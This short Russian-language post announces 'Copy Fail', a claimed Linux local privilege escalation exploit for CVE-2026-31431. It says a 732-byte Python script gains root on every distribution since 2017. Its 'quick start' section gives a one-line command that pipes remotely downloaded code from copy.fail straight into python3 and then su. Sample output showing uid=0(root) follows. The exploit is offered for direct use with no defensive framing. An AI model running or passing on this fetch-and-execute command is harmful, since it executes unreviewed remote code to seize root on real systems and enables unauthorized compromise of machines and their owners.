
Эксплойт для CVE-2026-31431: Python-скрипт размером 732 байта, который использует логическую ошибку прямолинейного выполнения для получения прав root на всех дистрибутивах Linux начиная с 2017 года.
Большинство LPE-эксплойтов для Linux требуют окна гонки или специфичного для ядра смещения. Copy Fail — это прямолинейный логический изъян — ему не нужно ни то, ни другое. Один и тот же Python-скрипт размером 732 байта даёт root-права на каждом дистрибутиве Linux, выпущенном с 2017 года.
Быстрый запуск:
curl https://copy.fail/exp | python3 && su
id
uid=0(root) gid=1002(user) groups=1002(user)